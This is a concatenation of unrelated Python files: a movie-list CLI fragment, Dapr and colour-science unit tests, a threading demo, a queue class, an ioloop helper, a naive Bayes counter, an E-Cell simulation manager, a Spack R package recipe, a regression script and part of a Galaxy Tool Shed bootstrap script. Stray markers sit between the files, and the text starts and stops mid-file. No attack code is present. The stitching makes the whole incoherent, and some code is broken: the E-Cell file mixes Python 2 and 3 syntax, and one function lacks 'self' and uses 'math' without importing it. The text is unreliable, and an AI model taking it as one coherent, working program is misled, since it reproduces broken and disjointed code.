-- {movie[2]}") year_index += 1 if year_index == 0: print("No item found") user_find_input = input(input_find_text) year_index = 0 else: print('Unknown command. Please try again') user_find_input = input(input_find_text) # main menu loop while menu_input != 'q': # quit option if menu_input == 'l': # list option cursor.execute("""SELECT * FROM movie_list""") rows_number = len(cursor.fetchall()) if rows_number == 0: # check if collection is empty print('The collection of movies is currently empty.\n') else: show_movie_list() menu_input = input(menu_text).lower() elif menu_input == 'a': # add option add_movie() menu_input = input(menu_text).lower() elif menu_input == 'f': # find option find_movie() menu_input = input(menu_text).lower() else: print('Unknown command. Please try again') # wrong command option menu_input = input(menu_text).lower() # ask again print('Thanks for using the Movie Collection App!') # app end tests/actor/test_actor_runtime_config.py # -*- coding: utf-8 -*- """ Copyright (c) Microsoft Corporation and Dapr Contributors. Licensed under the MIT License. 
""" import unittest from datetime import timedelta from dapr.actor.runtime.config import ActorRuntimeConfig, ActorReentrancyConfig class ActorRuntimeConfigTests(unittest.TestCase): def test_default_config(self): config = ActorRuntimeConfig() self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertEqual(config._reentrancy, None) self.assertEqual(config._entities, []) self.assertNotIn('reentrancy', config.as_dict().keys()) self.assertNotIn('remindersStoragePartitions', config.as_dict().keys()) def test_default_config_with_reentrancy(self): reentrancyConfig = ActorReentrancyConfig(enabled=True) config = ActorRuntimeConfig(reentrancy=reentrancyConfig) self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertEqual(config._reentrancy, reentrancyConfig) self.assertEqual(config._entities, []) self.assertEqual(config.as_dict()['reentrancy'], reentrancyConfig.as_dict()) self.assertEqual(config.as_dict()['reentrancy']['enabled'], True) self.assertEqual(config.as_dict()['reentrancy']['maxStackDepth'], 32) self.assertNotIn('remindersStoragePartitions', config.as_dict().keys()) def test_update_entities(self): config = ActorRuntimeConfig() config.update_entities(['actortype1']) self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertEqual(config._entities, ['actortype1']) self.assertNotIn('remindersStoragePartitions', config.as_dict().keys()) def test_update_entities_two_types(self): config = ActorRuntimeConfig() config.update_entities(['actortype1', 'actortype1']) self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertEqual(config._entities, ['actortype1', 'actortype1']) self.assertNotIn('remindersStoragePartitions', config.as_dict().keys()) def test_set_reminders_storage_partitions(self): config = ActorRuntimeConfig(reminders_storage_partitions=12) self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertNotIn('reentrancy', config.as_dict().keys()) self.assertEqual(config._reminders_storage_partitions, 12) self.assertEqual(config.as_dict()['remindersStoragePartitions'], 12) if __name__ == '__main__': unittest.main() # -*- encoding: utf-8 -*- import threading def func(n): for i in range(100): print(str(i) + threading.current_thread().name) t1 = threading.Thread(target=func, args=('1',)) t2 = threading.Thread(target=func, args=('2',)) threads = [] threads.append(t1) threads.append(t2) if __name__ == '__main__': for t in threads: t.setDaemon(True) t.start() t.join() print('this is a thread 
{}'.format(threading.current_thread().name)) # -*- coding: utf-8 -*- """ Defines unit tests for :mod:`colour.models.hdr_ipt` module. """ import numpy as np import unittest from itertools import permutations from colour.models import XYZ_to_hdr_IPT, hdr_IPT_to_XYZ from colour.models.hdr_ipt import exponent_hdr_IPT from colour.utilities import domain_range_scale, ignore_numpy_errors __author__ = 'Colour Developers' __copyright__ = 'Copyright (C) 2013-2021 - Colour Developers' __license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause' __maintainer__ = 'Colour Developers' __email__ = '' __status__ = 'Production' __all__ = ['TestExponent_hdr_IPT', 'TestXYZ_to_hdr_IPT', 'TestHdr_IPT_to_XYZ'] class TestExponent_hdr_IPT(unittest.TestCase): """ Defines :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition unit tests methods. """ def test_exponent_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition. """ self.assertAlmostEqual( exponent_hdr_IPT(0.2, 100), 0.482020919845900, places=7) self.assertAlmostEqual( exponent_hdr_IPT(0.4, 100), 0.667413581325092, places=7) self.assertAlmostEqual( exponent_hdr_IPT(0.4, 100, method='Fairchild 2010'), 1.219933220992410, places=7) self.assertAlmostEqual( exponent_hdr_IPT(0.2, 1000), 0.723031379768850, places=7) def test_n_dimensional_exponent_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition n-dimensional arrays support. """ Y_s = 0.2 Y_abs = 100 epsilon = exponent_hdr_IPT(Y_s, Y_abs) Y_s = np.tile(Y_s, 6) Y_abs = np.tile(Y_abs, 6) epsilon = np.tile(epsilon, 6) np.testing.assert_almost_equal( exponent_hdr_IPT(Y_s, Y_abs), epsilon, decimal=7) Y_s = np.reshape(Y_s, (2, 3)) Y_abs = np.reshape(Y_abs, (2, 3)) epsilon = np.reshape(epsilon, (2, 3)) np.testing.assert_almost_equal( exponent_hdr_IPT(Y_s, Y_abs), epsilon, decimal=7) Y_s = np.reshape(Y_s, (2, 3, 1)) Y_abs = np.reshape(Y_abs, (2, 3, 1)) epsilon = np.reshape(epsilon, (2, 3, 1)) np.testing.assert_almost_equal( exponent_hdr_IPT(Y_s, Y_abs), epsilon, decimal=7) def test_domain_range_scale_exponent_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition domain and range scale support. """ Y_s = 0.2 Y_abs = 100 epsilon = exponent_hdr_IPT(Y_s, Y_abs) d_r = (('reference', 1), (1, 1), (100, 100)) for scale, factor in d_r: with domain_range_scale(scale): np.testing.assert_almost_equal( exponent_hdr_IPT(Y_s * factor, Y_abs), epsilon, decimal=7) @ignore_numpy_errors def test_nan_exponent_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition nan support. """ cases = np.array([-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]) exponent_hdr_IPT(cases, cases) class TestXYZ_to_hdr_IPT(unittest.TestCase): """ Defines :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition unit tests methods. """ def test_XYZ_to_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition. 
""" np.testing.assert_almost_equal( XYZ_to_hdr_IPT(np.array([0.20654008, 0.12197225, 0.05136952])), np.array([48.39376346, 42.44990202, 22.01954033]), decimal=7) np.testing.assert_almost_equal( XYZ_to_hdr_IPT( np.array([0.20654008, 0.12197225, 0.05136952]), method='Fairchild 2010'), np.array([30.02873147, 83.93845061, 34.90287382]), decimal=7) np.testing.assert_almost_equal( XYZ_to_hdr_IPT( np.array([0.20654008, 0.12197225, 0.05136952]), Y_s=0.5), np.array([20.75088680, 37.98300971, 16.66974299]), decimal=7) np.testing.assert_almost_equal( XYZ_to_hdr_IPT( np.array([0.07818780, 0.06157201, 0.28099326]), Y_abs=1000), np.array([23.83205010, -5.98739209, -32.74311745]), decimal=7) def test_n_dimensional_XYZ_to_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition n-dimensional support. """ XYZ = np.array([0.20654008, 0.12197225, 0.05136952]) Y_s = 0.2 Y_abs = 100 IPT_hdr = XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs) XYZ = np.tile(XYZ, (6, 1)) IPT_hdr = np.tile(IPT_hdr, (6, 1)) np.testing.assert_almost_equal( XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs), IPT_hdr, decimal=7) Y_s = np.tile(Y_s, 6) Y_abs = np.tile(Y_abs, 6) np.testing.assert_almost_equal( XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs), IPT_hdr, decimal=7) XYZ = np.reshape(XYZ, (2, 3, 3)) Y_s = np.reshape(Y_s, (2, 3)) Y_abs = np.reshape(Y_abs, (2, 3)) IPT_hdr = np.reshape(IPT_hdr, (2, 3, 3)) np.testing.assert_almost_equal( XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs), IPT_hdr, decimal=7) def test_domain_range_scale_XYZ_to_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition domain and range scale support. """ XYZ = np.array([0.20654008, 0.12197225, 0.05136952]) Y_s = 0.2 Y_abs = 100 IPT_hdr = XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs) d_r = (('reference', 1, 1), (1, 1, 0.01), (100, 100, 1)) for scale, factor_a, factor_b in d_r: with domain_range_scale(scale): np.testing.assert_almost_equal( XYZ_to_hdr_IPT(XYZ * factor_a, Y_s * factor_a, Y_abs), IPT_hdr * factor_b, decimal=7) @ignore_numpy_errors def test_nan_XYZ_to_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition nan support. """ cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan] cases = set(permutations(cases * 3, r=3)) for case in cases: XYZ = np.array(case) Y_s = case[0] Y_abs = case[0] XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs) class TestHdr_IPT_to_XYZ(unittest.TestCase): """ Defines :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition unit tests methods. """ def test_hdr_IPT_to_XYZ(self): """ Tests :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition. """ np.testing.assert_almost_equal( hdr_IPT_to_XYZ(np.array([48.39376346, 42.44990202, 22.01954033])), np.array([0.20654008, 0.12197225, 0.05136952]), decimal=7) np.testing.assert_almost_equal( hdr_IPT_to_XYZ( np.array([30.02873147, 83.93845061, 34.90287382]), method='Fairchild 2010'), np.array([0.20654008, 0.12197225, 0.05136952]), decimal=7) np.testing.assert_almost_equal( hdr_IPT_to_XYZ( np.array([20.75088680, 37.98300971, 16.66974299]), Y_s=0.5), np.array([0.20654008, 0.12197225, 0.05136952]), decimal=7) np.testing.assert_almost_equal( hdr_IPT_to_XYZ( np.array([23.83205010, -5.98739209, -32.74311745]), Y_abs=1000), np.array([0.07818780, 0.06157201, 0.28099326]), decimal=7) def test_n_dimensional_hdr_IPT_to_XYZ(self): """ Tests :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition n-dimensional support. 
""" IPT_hdr = np.array([48.39376346, 42.44990202, 22.01954033]) Y_s = 0.2 Y_abs = 100 XYZ = hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs) IPT_hdr = np.tile(IPT_hdr, (6, 1)) XYZ = np.tile(XYZ, (6, 1)) np.testing.assert_almost_equal( hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs), XYZ, decimal=7) Y_s = np.tile(Y_s, 6) Y_abs = np.tile(Y_abs, 6) np.testing.assert_almost_equal( hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs), XYZ, decimal=7) IPT_hdr = np.reshape(IPT_hdr, (2, 3, 3)) Y_s = np.reshape(Y_s, (2, 3)) Y_abs = np.reshape(Y_abs, (2, 3)) XYZ = np.reshape(XYZ, (2, 3, 3)) np.testing.assert_almost_equal( hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs), XYZ, decimal=7) def test_domain_range_scale_hdr_IPT_to_XYZ(self): """ Tests :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition domain and range scale support. """ IPT_hdr = np.array([24.88927680, -11.44574144, 1.63147707]) Y_s = 0.2 Y_abs = 100 XYZ = hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs) d_r = (('reference', 1, 1, 1), (1, 0.01, 1, 1), (100, 1, 100, 100)) for scale, factor_a, factor_b, factor_c in d_r: with domain_range_scale(scale): np.testing.assert_almost_equal( hdr_IPT_to_XYZ(IPT_hdr * factor_a, Y_s * factor_b, Y_abs), XYZ * factor_c, decimal=7) @ignore_numpy_errors def test_nan_hdr_IPT_to_XYZ(self): """ Tests :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition nan support. """ cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan] cases = set(permutations(cases * 3, r=3)) for case in cases: IPT_hdr = np.array(case) Y_s = case[0] Y_abs = case[0] hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs) if __name__ == '__main__': unittest.main() 1-10 # @name queues.py # @ref https://classroom.udacity.com/courses/ud513/lessons/7117335401/concepts/78875255560923 # @ref https://docs.python.org/3/library/collections.html # deque - list-like container with fast appends and pops on either end """ @ref https://docs.python.org/3/library/collections.html#collections.deque Returns new deque object initialized left-to-right( using append()) with data from iterable. If iterable not specified, new deque empty Deques support thread-safe, memory efficient appends, pops from either side of deque, O(1) in either direction. Deque vs. list. List optimized for fast fixed-length operations, incur O(N) memory movement costs for pop(0) and insert(0, v) operations, which change both size and position of underlying data representation. """ from collections import deque # @ref https://classroom.udacity.com/courses/ud513/lessons/7117335401/concepts/78875255560923 # deque as a queue # d.appendleft(8) is the "push" to d.pop() # d.pop() class Queue: def __init__(self, head=None): self.storage = [head] def enqueue(self, new_element): self.storage.append(new_element) pass def peek(self): return self.storage[0] pass def dequeue(self): return self.storage.pop(0) 1-10 from django.utils import timezone from know_me import models from know_me.serializers import subscription_serializers from test_utils import serialized_time def test_serialize(): """ Serializing an Apple receipt should return an overview of the information contained in the receipt. 
""" receipt = models.AppleReceipt(expiration_time=timezone.now()) serializer = subscription_serializers.AppleReceiptInfoSerializer(receipt) assert serializer.data == { "expiration_time": serialized_time(receipt.expiration_time) } 1-10 from .ioloop import IOLoop, time DEFAULT_SAMPLE_INTERVAL = 0.05 def wait_for_many_results(results, **kwargs): ioloop = IOLoop() results = dict((result, None) for result in results) for result in results.keys(): result.register_to_ioloop(ioloop) timeout = kwargs.pop('timeout', None) deadline = _get_deadline(results.keys(), timeout) # Note that the _should_still_wait predicate might return False if # things happen real quickly while True: current_time = time() ioloop.do_iteration(_get_wait_interval(current_time, deadline)) _sweep_finished_results(results, ioloop) if not _should_still_wait(results, deadline=deadline): break _sweep_finished_results(results, ioloop) return list(results.values()) def flush(result): ioloop = IOLoop() result.register_to_ioloop(ioloop) ioloop.flush() def _get_deadline(results, timeout=None): """ returns the earliest deadline point in time """ start_time = time() all_deadlines = set(result.get_deadline() for result in results) all_deadlines.discard(None) if timeout is not None: all_deadlines.add(start_time + timeout) return min(all_deadlines) if all_deadlines else None def _get_wait_interval(current_time, deadline): if deadline is None: return DEFAULT_SAMPLE_INTERVAL return max(0, min(DEFAULT_SAMPLE_INTERVAL, (deadline - current_time))) def _sweep_finished_results(results, ioloop): for result in results.keys(): if results[result] is not None: continue # we unregister and re-register, because when is_finished returns True, the pipes are flushed and closed result.unregister_from_ioloop(ioloop) if result.is_finished(): results[result] = result result.register_to_ioloop(ioloop) def _should_still_wait(results, deadline): if all(r is not None for r in results.values()): return False if deadline is not None and deadline < time(): return False return True import re import csv fh=open("dataset.csv","r") # The delimiter in the csv file is '+' instead of comma. This was done to compromise with the commas in the sentence in the sentence of the dataset used. reader = csv.reader(fh, delimiter='+') #print(reader) # It is the dictionary that has the data : { label(positive/negative) : { word : count of number of occurences of the word } } dataset={} # It is the dictionary that keeps the count of records that are labeled a label l for each label l # That is, { label l : No. 
of records that are labeled l } no_of_items={} # This is the dictionary that contains the count of the occurences of word under each label # That is, { word : { label l : count of the occurence of word with label l } } feature_set={} # For each sentence in dataset for row in reader: # Initialize the label in the dictionary if not present already no_of_items.setdefault(row[1],0) # Increase the count of occurence of label by 1 for every occurence no_of_items[row[1]]+=1 # Initialize the dictionary for a label if not present dataset.setdefault(row[1],{}) # Split the sentence with respect to non-characters, and donot split if apostophe is present split_data=re.split('[^a-zA-Z\']',row[0]) # For every word in split data for i in split_data: # Removing stop words to a small extent by ignoring words with length less than 3 if len(i) > 2: # Initialize the word count in dataset dataset[row[1]].setdefault(i.lower(),0) # Increase the word count on its occurence with label row[1] dataset[row[1]][i.lower()]+=1 # Initialze a dictionary for a newly found word in feature set feature_set.setdefault(i.lower(),{}) # If the label was found for the word, for the first time, initialize corresponding count value for word as key feature_set[i.lower()].setdefault(row[1],0) # Increment the count for the word in that label feature_set[i.lower()][row[1]]+=1 0 # Author # Fri Jan 30 15:57:01 GMT 2009 import ecell.Session as Session #import mySession as Session import ecell.ecs import ecell.config import ecell.emc import os import numpy from sumatra.external.NeuroTools import parameters class EcellManager(): """Control and instatiate the ecell simulator embedding it in an handy python object""" def __init__(self, filename=None): ecell.ecs.setDMSearchPath( os.pathsep.join( ecell.config.dm_path ) ) self.sim = ecell.emc.Simulator() if ecell.config.version < '3.2.0': self.ses = Session.Session(self.sim, changeDirectory=False) else: self.ses = Session.Session(self.sim) # Load the model self.ses.loadModel(filename) self.molToTrack = ('ca', 'moles_bound_ca_per_moles_cam', 'Rbar', 'PP2Bbar', 'CaMKIIbar', 'PP1abar', # Active PP1/Total PP1 'AMPAR', # 'AMPAR_P', 'D', 'totDp', 'Dpbar' ) # Tracking the calcium self.ca = self.ses.createEntityStub( 'Variable:/Spine:ca' ) self.CaMKIIbar = self.ses.createEntityStub( 'Variable:/Spine:CaMKIIbar' ) self.ampar_P = self.ses.createEntityStub('Variable:/Spine:AMPAR_P') self.ca_in = self.ses.createEntityStub('Process:/Spine:ca_in') self.ca_leak = self.ses.createEntityStub('Process:/Spine:ca_leak') self.ca_pump = self.ses.createEntityStub('Process:/Spine:ca_pump') def createLoggers(self): """Create the logger to track the species""" loggers = {} #log = ecell.LoggerStub() for mol in self.molToTrack: loggers[mol] = self.ses.createLoggerStub( "Variable:/Spine:" + mol + ":Value" ) loggers[mol].create() # This creat the Logger Object in the backend if mol == 'ca': loggers['ca_conc'] = self.ses.createLoggerStub( "Variable:/Spine:" + mol + ":MolarConc" ) loggers['ca_conc'].create() # This creat the Logger Object in the backend self.loggers = loggers def calcWeight(CaMKIIbar, PP2Bbar, alpha, beta, n=3, k=0.5): """Calc the weight of the synapses according to the CaMKII and Pospahtases PP2B and PP1""" # CaMKII term CaMKII_factor = math.pow(CaMKIIbar, n) / (math.pow(k, n) + math.pow(CaMKIIbar, n)) Phosphatase_factor = math.pow(PP2Bbar, n) / (math.pow(k, n) + math.pow(PP2Bbar, n)) scaled_CaMKII_factor = alpha * CaMKII_factor scaled_Phospatese_factor = beta * Phosphatase_factor weight = 1 + 
            scaled_CaMKII_factor - scaled_Phospatese_factor
        s = "Weight: %s CaMKII factor %s, Phosphatase factor %s" % (
            weight, scaled_CaMKII_factor, scaled_Phospatese_factor)
        return weight

    def calcium_peak(self, k_value, duration):
        """
        Mimic the calcium peak

        :Parameters
            k_value: the rate of calcium to enter
            duration: Duration of the spike
        """
        basal = self.ca_in['k']
        self.ca_in['k'] = k_value
        self.ses.run(duration)
        self.ca_in['k'] = basal

    def calciumTrain(self, spikes=30, interval=0.1):
        """Create a train of calcium with the specified number of spikes and interval

        :Parameters
            spikes: number of spikes
            interval: Interval between spikes
        """
        for i in range(spikes):
            self.calcium_peak(4.0e8,  # Magic number from Lu
                              0.00001  # Really fast spike to avoid the overlap
                              )
            self.ses.run(interval)

    def converToTimeCourses(self):
        timeCourses = {}
        for key in self.loggers:
            timeCourses[key] = self.loggers[key].getData()
        self.timeCourses = timeCourses


##############################################
# Testing methods

def testCalciumTrain(spikes_number, interval, filename):
    """Run a test simulation with a train of calcium input"""
    print "Test the results of a train of calcium"
    ecellManager = EcellManager(filename)
    ecellManager.createLoggers()
    #ecellManager.ca_in = ecellManager.ses.createEntityStub('Process:/Spine:ca_in')
    print "Model loaded, loggers created. Integration start."
    ecellManager.ses.run(300)
    print "Calcium Train"
    ecellManager.calciumTrain(spikes=spikes_number, interval=interval)
    ecellManager.ses.run(400)
    ecellManager.converToTimeCourses()
    print "CalciumTrain Test Concluded\n##################"
    return ecellManager


def testChangeCalciumValue(interval, caValue,
                           filename="../biochemical_circuits/biomd183_noCalcium.eml"):
    """Run a test simulation changing the calcium value on the fly"""
    print "Showcase of the possibility to change the level of calcium on the fly"
    ecellManager = EcellManager(filename)
    ecellManager.createLoggers()
    print "Loggers created"
    print "Running with the updating interval of : %f" % interval
    tstop = 150
    while ecellManager.ses.getCurrentTime() < tstop:
        ecellManager.ca['Value'] = caValue
        ecellManager.ses.run(interval)
        #ecellManager.ses.run(1)
        #print ecellManager.ses.getCurrentTime()
    print "Immission of Calcium"
    print "Value of Calcium %f" % ecellManager.ca.getProperty('Value')
    spikes = 4
    for i in range(spikes):
        ecellManager.ca['Value'] = 7200
        ecellManager.ses.run(0.020)
        ecellManager.ca['Value'] = caValue
        ecellManager.ses.run(0.010)
    tstop = tstop + 500
    while ecellManager.ses.getCurrentTime() < tstop:
        ecellManager.ca['Value'] = caValue
        ecellManager.ses.run(interval)
        #ecellManager.ses.run(1)
        #print ecellManager.ses.getCurrentTime()
    ecellManager.converToTimeCourses()
    print "ChangeCalciumValue Test Concluded"
    return ecellManager


if __name__ == "__main__":
    import sys

    if len(sys.argv) != 2:
        print("No parameter file supplied. Abort.")
        usage = 'python ecellManager.py ecellControl.param'
        print usage
        sys.exit()
    parameter_file = sys.argv[1]
    param = parameters.ParameterSet(parameter_file)

    ## Setting the matplotlib backend
    import matplotlib
    if param['interactive'] == False:
        matplotlib.use('Agg')
        print "Switching backend to Agg.
Batch execution" import matplotlib.pyplot as plt from helpers.plotter import EcellPlotter import helpers loader = helpers.Loader() # ecellManager = testChangeCalciumValue(interval, caValue) if param['running_type'] == 'train': ecellManager = testCalciumTrain(param['num_spikes'], param['delay'], param['biochemical_filename']) ecp = EcellPlotter() if param['interactive'] == False: dir = loader.create_new_dir(prefix=os.getcwd()) loader.save(ecellManager.timeCourses, dir, "timeCourses") ecp.plot_timeCourses(ecellManager.timeCourses, save=True, dir=dir) ecp.plot_weight(ecellManager.timeCourses, dir=dir) else: ecp.plot_timeCourses(ecellManager.timeCourses) ecp.plot_weight(ecellManager.timeCourses) plt.show() # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class RGitcreds(RPackage): """Query 'git' Credentials from 'R'. Query, set, delete credentials from the 'git' credential store. Manage 'GitHub' tokens and other 'git' credentials. This package is to be used by other packages that need to authenticate to 'GitHub' and/or other 'git' repositories.""" cran = "gitcreds" version('0.1.1', sha256='b14aaf4e910a9d2d6c65c93e645f0b0159c00898e669f917f83c03dfedb1dfea') depends_on('git', type='run') 0 import pandas as pd import numpy as np from matplotlib import pyplot as plt from sklearn import preprocessing, metrics from sklearn.linear_model import LinearRegression, Ridge, Lasso from itertools import combinations ridge_alpha = 100 # Ridge regression parameter lasso_alpha = 0.001 # Lasso regression parameter # Normalize a column def norm(df: pd.DataFrame, column_to_normalize: str): temp_col = df[column_to_normalize].values.astype(float) min_max_scalar = preprocessing.MinMaxScaler() temp_col_scaled = min_max_scalar.fit_transform(temp_col.reshape(-1, 1)) temp_df = pd.DataFrame(temp_col_scaled) df[column_to_normalize] = temp_df return df # Importing the data df_Xtrain = pd.read_csv("./data/Xtrain.csv") df_Xtest = pd.read_csv("./data/Xtest.csv") df_Xtrain.drop(columns=['Unnamed: 0'], axis=1, inplace=True) df_Xtest.drop(columns=['Unnamed: 0'], axis=1, inplace=True) # Data normalization (NVP column needs normalization) df_Xtrain = norm(df_Xtrain, 'NVP') df_Xtest = norm(df_Xtest, 'NVP') # Show top 10 rows of dataframe print(df_Xtrain.head(10)) # Dataset description print(df_Xtrain.describe()) # Split X columns and Y column X_train = df_Xtrain.drop(columns=['NVP']).values Y_train = df_Xtrain['NVP'] X_test = df_Xtest.drop(columns=['NVP']).values Y_test = df_Xtest['NVP'] print('X_train shape: {} and Y_train shape: {}'.format(X_train.shape, Y_train.shape)) print('X_test shape: {} and Y_test shape: {}'.format(X_test.shape, Y_test.shape)) # training part for Multivariate linear regression regressor = LinearRegression() regressor.fit(X_train, Y_train) # Find coefficients coeff_df = pd.DataFrame(regressor.coef_, list(df_Xtrain.columns)[1:], columns=['Coefficient']) # print(coeff_df) # Prediction matters! 
Y_pred = regressor.predict(X_test)

# Analysis of predictions
df_compare = pd.DataFrame({'Actual': Y_test, 'Multivariate_Regression': Y_pred})
# print(df_compare.head(20))

# Errors and score
print('\n', 'Multivariate linear regression model', '\n')
print('Number of used coefficients:', np.sum(regressor.coef_ != 0))
print('R squared Score:', regressor.score(X_test, Y_test))
print('Mean Absolute Error:', metrics.mean_absolute_error(Y_test, Y_pred))
print('Mean Squared Error:', metrics.mean_squared_error(Y_test, Y_pred))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Y_test, Y_pred)))

# Training part for Ridge regression
rr = Ridge(alpha=ridge_alpha)
rr.fit(X_train, Y_train)

# Ridge model evaluation
Y_pred_ridge = rr.predict(X_test)
df_compare['ridge'] = Y_pred_ridge

# Errors and score
print('\n', 'Ridge regression model', '\n')
print('Number of used coefficients:', np.sum(rr.coef_ != 0))
print('R squared test Score:', rr.score(X_test, Y_test))
print('Mean Absolute Error:', metrics.mean_absolute_error(Y_test, Y_pred_ridge))
print('Mean Squared Error:', metrics.mean_squared_error(Y_test, Y_pred_ridge))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Y_test, Y_pred_ridge)))

# Training part for Lasso
lasso = Lasso(alpha=lasso_alpha, max_iter=10e5)
lasso.fit(X_train, Y_train)

# Lasso model evaluation
Y_pred_lasso = lasso.predict(X_test)
df_compare['lasso'] = Y_pred_lasso

# Errors and score
print('\n', 'Lasso regression model', '\n')
print('Number of used coefficients:', np.sum(lasso.coef_ != 0))
print('R squared test Score:', lasso.score(X_test, Y_test))
print('Mean Absolute Error:', metrics.mean_absolute_error(Y_test, Y_pred_lasso))
print('Mean Squared Error:', metrics.mean_squared_error(Y_test, Y_pred_lasso))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Y_test, Y_pred_lasso)))

# Plot the differences
df_compare.sample(25).plot(kind='bar', figsize=(10, 8))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
# plt.show()
plt.savefig('./plots/actual_predicted_difference.png')

#!/usr/bin/python
from __future__ import print_function

import optparse
import os
import sys

from six.moves.configparser import ConfigParser
from sqlalchemy.exc import OperationalError, ProgrammingError

sys.path.insert(1, os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, os.pardir, 'lib'))

import galaxy.webapps.tool_shed.model.mapping as tool_shed_model
from tool_shed.util import xml_util


def check_db(config_parser):
    dburi = None
    if config_parser.has_option('app:main', 'database_connection'):
        dburi = config_parser.get('app:main', 'database_connection')
    elif config_parser.has_option('app:main', 'database_file'):
        db_file = config_parser.get('app:main', 'database_file')
        dburi = "sqlite:///%s?isolation_level=IMMEDIATE" % db_file
    else:
        sys.exit('The database configuration setting is missing from the tool_shed.ini file. Add this setting before attempting to bootstrap.')
    sa_session = None
    database_exists_message = 'The database configured for this Tool Shed is not new, so bootstrapping is not allowed. '
    database_exists_message += 'Create a new database that has not been migrated before attempting to bootstrap.'
try: model = tool_shed_model.init(config_parser.get('app:main', 'file_path'), dburi, engine_options={}, create_tables=False) sa_session = model.context.current sys.exit(database_exists_message) except ProgrammingError: pass except OperationalError: pass try: if sa_session is not None: result = sa_session.execute('SELECT version FROM migrate_version').first() if result[0] >= 2: sys.exit(database_exists_message) else: pass except ProgrammingError: pass if config_parser.has_option('app:main', 'hgweb_config_dir'): hgweb_config_parser = ConfigParser() hgweb_dir = config_parser.get('app:main', 'hgweb_config_dir') hgweb_config_file = os.path.join(hgweb_dir, 'hgweb.config') if not os.path.exists(hgweb_config_file): sys.exit(0) hgweb_config_parser.read(hgweb_config_file) configured_repos = hgweb_config_parser.items('paths') if len(configured_repos) >= 1: message = "This Tool Shed's hgweb.config file contains entries, so bootstrapping is not allowed. Delete" message += " the current hgweb.config file along with all associated repositories in the configured " message += "location before attempting to boostrap." sys.exit(message) else: sys.exit(0) else: sys.exit(0) sys.exit(0) def admin_user_info(): user_info_config = os.path.abspath(os.path.join(os.getcwd(), 'scripts/tool_shed/bootstrap_tool_shed', 'user_info.xml')) tree, error_message = xml_util.parse_xml(user_info_config) username = None email = None password = None if tree is None: print("The XML file ", user_info_config, " seems to be invalid, using defaults.") email = '' password = '' username = 'admin' else: root = tree.getroot() for elem in root: if elem.tag == 'email': email = elem.text elif elem.tag == 'password': password = elem.text elif elem.tag == 'username': username = elem.text return (username, email, password) def get_local_tool_shed_url(config_parser): port = '9009' if config_parser.has_section('server:main'): if config_parser.has_option('server:main', 'port'): port = config_parser.get('server:main', 'port') host = '127.0.0.1' print('http://%s:%s' % (host, port)) return 0 def main(args): config_parser = ConfigParser() if os.path.exists(args.config): config_parser.read(args.config) else: return 1 if args.method == 'check_db': return check_db(config_parser) elif args.method == 'admin_user_info': (username, email, password) = admin_user_info() print('%s__SEP__%s__SEP__%s' % (username, email, password)) return 0 elif args.method == 'get_url': return 